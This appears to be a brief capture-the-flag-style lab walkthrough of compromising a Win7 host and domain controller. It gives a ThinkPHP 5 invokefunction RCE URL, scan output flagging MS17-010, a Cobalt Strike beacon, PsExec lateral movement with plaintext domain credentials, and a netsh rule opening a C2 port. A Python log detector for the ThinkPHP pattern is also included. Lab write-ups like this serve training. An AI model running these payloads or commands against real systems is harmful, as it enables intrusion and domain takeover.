Just practicing!
Basic setup
- Win7
  - 192.168.31.0/24, 192.168.138.0/24
  - sun\leo 123.com
  - sun\Administrator dc123.com
  - Start phpStudy on the C: drive
- DC
  - 192.168.138.0/24
  - sun\admin 2020.com
Run an nmap scan first.
The web service is ThinkPHP, so go straight at it:
http://192.168.31.44/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
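Added defensive example (not part of the original write-up): a Python check that flags requests matching the ThinkPHP 5 `invokefunction` controller RCE pattern shown above when run over web server access logs. The log lines are constructed, and the combined log format layout is an assumption.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access log lines (combined log format); not taken from the write-up.
SAMPLE_LOG = """\
192.168.31.10 - - [01/Jan/2024:10:00:01 +0800] "GET /?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 200 931 "-" "Mozilla/5.0"
192.168.31.11 - - [01/Jan/2024:10:00:02 +0800] "GET /index.php/index/index HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.31.12 - - [01/Jan/2024:10:00:03 +0800] "GET /?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 200 931 "-" "curl/7.68.0"
192.168.31.13 - - [01/Jan/2024:10:00:04 +0800] "POST /index.php?s=captcha HTTP/1.1" 200 77 "-" "python-requests/2.25"
"""

# Combined log format: client ip, identity, user, [timestamp], "METHOD target PROTO", status, ...
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def is_thinkphp_invokefunction(target: str) -> bool:
    """True when the request's query string carries the ThinkPHP 5.x controller RCE
    shape: a route `s=...\\think\\app/invokefunction` plus a `function=` parameter
    naming the PHP callable to run (call_user_func_array in the write-up's request)."""
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    # parse_qs already percent-decodes once; unquote again to catch double encoding.
    routes = [unquote(v).lower() for v in qs.get("s", [])]
    has_route = any("\\think\\app" in r and "invokefunction" in r for r in routes)
    return has_route and bool(qs.get("function"))


def scan_log(text: str) -> list[dict]:
    """Return one alert dict per log line whose request matches the pattern."""
    alerts = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # unparsable line: skip it rather than abort the whole scan
        if is_thinkphp_invokefunction(m["target"]):
            alerts.append({"ip": m["ip"], "ts": m["ts"],
                           "status": int(m["status"]), "target": m["target"]})
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        # A 200 on such a request suggests the payload executed, not just that it was tried.
        print(f"[ALERT] {a['ts']} {a['ip']} -> {a['target']} (HTTP {a['status']})")
```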
Get a Cobalt Strike (CS) beacon online.
Do a round of information gathering.
Ran a scan with fscan:
[+] received output:
fscan version: 1.8.2
start infoscan
(icmp) Target 192.168.138.136 is alive
(icmp) Target 192.168.138.138 is alive
[*] Icmp alive hosts len is: 2
192.168.138.136:139 open
192.168.138.138:135 open
192.168.138.138:88 open
192.168.138.136:3306 open
192.168.138.138:445 open
192.168.138.136:445 open
192.168.138.138:139 open
192.168.138.136:135 open
192.168.138.136:80 open
[*] alive ports len is: 9
start vulscan
[*] NetInfo:
[*]192.168.138.136
[->]win7
[->]192.168.138.136
[->]192.168.31.44
[+] 192.168.138.136 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[*] WebTitle: http://192.168.138.136 code:200 len:931 title:None
[*] NetBios: 192.168.138.136 win7.sun.com Windows 7 Professional 7601 Service Pack 1
[*] NetBios: 192.168.138.138 [+]DC DC.sun.com Windows Server 2008 HPC Edition 7600
[*] NetInfo:
[*]192.168.138.138
[->]DC
[->]192.168.138.138
[+] 192.168.138.138 MS17-010 (Windows Server 2008 HPC Edition 7600)
[+] received output:
[+] http://192.168.138.136 poc-yaml-thinkphp5-controller-rce
[+] received output:
[+] http://192.168.138.136 poc-yaml-thinkphp5023-method-rce poc1
There is a DC (domain), and it is vulnerable to MS17-010.
First, escalate privileges on the current host with svc.
Dumped the domain controller password:
Next, go after the DC. It sits on the internal network, so first turn the current Win7 host into a pivot.
Then, since we already have the password, simply push the payload over with PsExec:
shell C:\phpStudy\PHPTutorial\WWW\public\PsExec64.exe -accepteula \\192.168.138.138 -u sun\Administrator -p dc123.com -d -c C:\phpStudy\PHPTutorial\WWW\public\beacon.exe
Awkward, I forgot that the password on the target machine had been changed.
Fixed the password and tried again.
The beacon failed to check in; presumably the Win7 firewall is blocking the port, so allow the CS port through:
shell netsh advfirewall firewall add rule name=cs dir=in action=allow protocol=TCP localport=4445
Ran it again and the beacon came online.
Finally, one more privilege escalation, and done.